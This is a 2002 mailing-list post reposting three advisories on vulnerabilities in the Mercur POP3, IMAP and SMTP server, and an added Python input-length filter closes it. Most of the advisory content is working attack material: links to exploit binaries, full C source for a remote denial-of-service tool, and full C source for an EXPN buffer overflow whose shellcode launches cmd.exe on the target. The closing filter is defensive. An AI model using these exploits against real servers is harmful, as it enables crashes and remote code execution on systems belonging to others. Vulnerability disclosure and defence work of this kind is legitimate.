[Helpc] Mercur vulnerabilities

  • From: "Shaka( Rudy)" <strub.rudy@xxxxxxxxx>
  • To: <helpc@xxxxxxxxxxxxx>
  • Date: Sat, 19 Oct 2002 12:34:36 +0200

 Title
15/3/2000

Mercur POP3 / IMAP server vulnerable to DoS

 Summary

UssrLabs found that the Mercur POP3 and IMAP Server
(<http://www.atrium-software.com/mercur/mercur_e.html>) is vulnerable to a
Denial of Service attack. The attack is possible due to improper bounds
checking.

 Details

Vulnerable systems:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01) for Windows NT
MERCUR IMAP4-Server (v3.20.01) for Windows NT

Example:
$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at
Tue, 14 Mar 2000 03:30:39 -0300
user [buffer]

Where [buffer] is approximately 2000 characters.

$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at
Tue, 14 Mar 2000 03:34:09 -0300
[buffer]

Where [buffer] is approximately 3000 characters.

Exploit:
Binary version of the POP3 DoS:
<http://www.ussrback.com/mercur/domrc32p.exe>

Binary version of the IMAP DoS:
<http://www.ussrback.com/mercur/domrc32i.exe>

Source code:
<http://www.ussrback.com/mercur/merc32ds.zip>

 Additional information

The information was provided by Ussr Labs <mailto:labs%20at%20USSRBACK.COM>.

Title
14/6/2000

Mercur Mail server large buffer exploit code has been released

 Summary

We already reported the vulnerability in the Mercur Mail server (see
<http://www.securiteam.com/exploits/Mercur_POP3___IMAP_server_vulnerable_to_DoS.html>,
"Mercur POP3 / IMAP server vulnerable to DoS"). Exploit source code has now
been released to test for this vulnerability.

 Details

Vulnerable systems:
MERCUR Mailserver 3.2

Exploit:
/*
 * Remote Denial of Service for Mercur 3.2
 * 
 * (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp@xxxxxxxxxx>
 *
 *
 * This code shows a Mercur 3.2 vulnerability in which, any remote
 * user can cause server shutdown. Previous Mercur versions may be
 * affected by this vulnerability.
 *
 * Greetings to all the other members and all my friends :) 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <strings.h>  /* bzero */
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void
usage (char *progname)
{
  fprintf (stderr, "Usage: %s <hostname> [type]\n", progname);
  fprintf (stderr, " Type:\n");
  fprintf (stderr, " 0 - IMAP4 (Default)\n");
  fprintf (stderr, " 1 - POP3\n");
  fprintf (stderr, " 2 - SMTP\n\n");
  exit (1);
}

int
main (int argc, char **argv)
{
  char *ptr, buffer[3000], remotedos[3100];
  int sock, type;
  struct sockaddr_in sin;
  in_addr_t ip;               /* 32-bit IPv4 address (was unsigned long) */
  struct hostent *he;

  fprintf (stderr,
   "\n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-\n");

  if (argc < 2)
    usage (argv[0]);

  type = 0;
  if (argc > 2)
    type = atol (argv[2]);

  /* Build the oversized argument: a run of 'X' (0x58), NUL-terminated. */
  ptr = buffer;
  switch (type)
    {
    case 1:
      memset (ptr, 0, 2048);
      memset (ptr, 88, 2046);
      break;
    default:
      memset (ptr, 0, sizeof (buffer));
      memset (ptr, 88, sizeof (buffer) - 2);
      break;
    }

  bzero (remotedos, sizeof (remotedos));

  /* Wrap the argument in the command each service fails to bounds-check. */
  switch (type)
    {
    case 1:
      snprintf (remotedos, sizeof (remotedos), "USER %s\r\n\r\n\r\n", buffer);
      break;
    case 2:
      snprintf (remotedos, sizeof (remotedos),
                "MAIL FROM: %s@xxxxxxxxxxxxxx\r\n\r\n\r\n", buffer);
      break;
    default:
      snprintf (remotedos, sizeof (remotedos), "1000 LOGIN %s\r\n\r\n\r\n",
                buffer);
      break;
    }

  if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
      perror ("socket()");
      return -1;
    }

  /* Resolve the target: hostname first, dotted-quad fallback. */
  if ((he = gethostbyname (argv[1])) != NULL)
    {
      memcpy (&ip, he->h_addr, sizeof (ip));
    }
  else if ((ip = inet_addr (argv[1])) == INADDR_NONE) /* was compared to NULL */
    {
      perror ("inet_addr()");
      return -1;
    }

  memset (&sin, 0, sizeof (sin));
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = ip;

  switch (type)
    {
    case 1:
      sin.sin_port = htons (110);
      break;
    case 2:
      sin.sin_port = htons (25);
      break;
    default:
      sin.sin_port = htons (143);
      break;
    }

  if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0)
    {
      perror ("connect()");
      return -1;
    }

  switch (type)
    {
    case 1:
      fprintf (stderr, "\nEngaged Mercur POP3... Sending data...\n");
      break;
    case 2:
      fprintf (stderr, "\nEngaged Mercur SMTP... Sending data...\n");
      break;
    default:
      fprintf (stderr, "\nEngaged Mercur IMAP4... Sending data...\n");
      break;
    }

  if (write (sock, remotedos, strlen (remotedos)) < strlen (remotedos))
    {
      perror ("write()");
      return -1;
    }

  sleep (4);

  fprintf (stderr, "Bye Bye baby!...\n\n");
  if (close (sock) < 0)
    {
      perror ("close()");
      return -1;
    }

  return (0);
}

 Additional information

The information has been provided by |[TDP]| <mailto:tdp%20at%20PSYNET.NET>.

Title
1/3/2001

MERCUR Mailserver Buffer Overflow Vulnerability (EXPN)

 Summary

MERCUR (<http://www.atrium-software.com/mercur/mercur_e.html>) offers the
necessary features to provide an efficient and effective communications
medium. A security vulnerability in the product allows remote attackers to
crash it and execute arbitrary code.

 Details

Vulnerable systems:
MERCUR Mailserver version 3.3 

Example:
< 220 MERCUR SMTP-Server (v3.30.03 Unregistered) for Windows NT ready at
Thu, 15 Feb 2001 03:55:34 -0800
> EXPN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Connection to host lost.

Exploit:
This exploit runs an instance of cmd.exe on target host:
/*
 MERCUR Mailserver 3.3 Remote Buffer Overflow
 Tested on Win2K AS SP1 with MERCUR SMTP-Server v3.30.03
 Martin Rakhmanoff
 martin@xxxxxxxxxxxxx
*/

#include <winsock2.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy */

/* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
char shellcode[] =
 "\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77\xFF\xD0\x33\xDB\x53"
 "\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64\x2E\x65\x78\x65\x0D\x0A";
/*
 In SoftICE bpx 001b:00418b65 - here eip is restored with the overwritten
 value...
*/

int main(int argc, char * argv[]){

 int i;
 char sploit[512];
 char buffer[512];

 WSADATA wsaData;
 SOCKET sock;
 struct sockaddr_in server;
 struct hostent *hp;

 WSAStartup(0x202,&wsaData);
 hp = gethostbyname("arena");   /* the author's test host */
 if(hp == NULL){
  fprintf(stderr,"gethostbyname() failed\n");
  WSACleanup();
  return 1;
 }
 memset(&server,0,sizeof(server));
 memcpy(&(server.sin_addr),hp->h_addr,hp->h_length);
 server.sin_family = hp->h_addrtype;
 server.sin_port = htons(25);
 sock = socket(AF_INET,SOCK_STREAM,0);
 connect(sock,(struct sockaddr*)&server,sizeof(server));

 sploit[0]='E';
 sploit[1]='X';
 sploit[2]='P';
 sploit[3]='N';
 sploit[4]=0x20;

 for(i=5;i<137;i++){
  sploit[i]=0x41;
 }

 // Return address
 //77E87D8B

 sploit[137]=0x8B;
 sploit[138]=0x89;
 sploit[139]=0xE8;
 sploit[140]=0x77;

 for(i=0;i<sizeof(shellcode);i++){
  sploit[i+141]=shellcode[i];
 }

 recv(sock,buffer,512,0);   /* consume the 220 banner */

 send(sock,sploit,173,0);

 closesocket(sock);
 WSACleanup();

 return 0;
}

Vendor Status:
Vendor was notified, and is working on a solution.

 Additional information

The information has been provided by Martin NA <mailto:martin%20at%20DIRECT.SPB.RU>.
--->
Shaka( Rudy)
Helpc list owner
shaka.rudy@xxxxxxxxx
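A defensive counterpart to the three advisories above, added here and not part of the original post or of any Mercur code: a Python pre-filter that checks POP3, IMAP and SMTP client command lines against length limits and flags the oversized USER, LOGIN and EXPN arguments that trigger the crashes described. The limit values are assumptions informed by the RFCs (noted in the comments), and the sample sessions are constructed.

```python
# Added defensive example (not from the advisories): a command-length
# pre-filter for POP3, IMAP and SMTP client lines.

# Limits in octets. POP3: RFC 2449 caps a command line at 255 and RFC 1939
# caps each argument at 40. SMTP: RFC 5321 caps the command line at 512 and a
# path at 256; the 64-octet local-part limit is applied to EXPN/VRFY here as
# an assumed policy. IMAP has no RFC cap, so 1024 is an assumed local policy.
LIMITS = {
    "pop3": {"line": 255, "arg": 40},
    "smtp": {"line": 512, "arg": 256, "EXPN": 64, "VRFY": 64},
    "imap": {"line": 1024, "arg": 1024},
}

def check_command(proto, raw):
    """Check one raw client line (CRLF included). Returns (ok, detail)."""
    lim = LIMITS[proto]
    if len(raw) > lim["line"]:
        return False, "line too long: %d > %d octets" % (len(raw), lim["line"])
    parts = raw.rstrip("\r\n").split(" ")
    if proto == "imap":
        # IMAP commands carry a client tag first ("1000 LOGIN ..." above).
        if len(parts) < 2:
            return False, "missing tag or command"
        parts = parts[1:]
    cmd = parts[0].upper()
    if not cmd.isalpha():
        return False, "non-alphabetic command keyword"
    max_arg = lim.get(cmd, lim["arg"])
    for arg in parts[1:]:
        if len(arg) > max_arg:
            return False, "%s argument too long: %d > %d octets" % (cmd, len(arg), max_arg)
    return True, cmd

def scan_session(proto, lines):
    """Return [(line_index, detail)] for each client line failing the check."""
    flagged = []
    for i, raw in enumerate(lines):
        ok, detail = check_command(proto, raw)
        if not ok:
            flagged.append((i, detail))
    return flagged

# Constructed sample sessions mirroring the advisory payload sizes.
SAMPLE = {
    "pop3": ["USER alice\r\n", "PASS s3cret\r\n", "USER " + "X" * 2046 + "\r\n"],
    "imap": ["1000 LOGIN alice secret\r\n", "X" * 3000 + "\r\n"],
    "smtp": ["HELO example.com\r\n", "EXPN " + "A" * 168 + "\r\n"],
}
```

Running scan_session over each entry of SAMPLE flags only the oversized line in each session; the same check placed in front of a listener or over captured session logs gives a detection signal for this class of input.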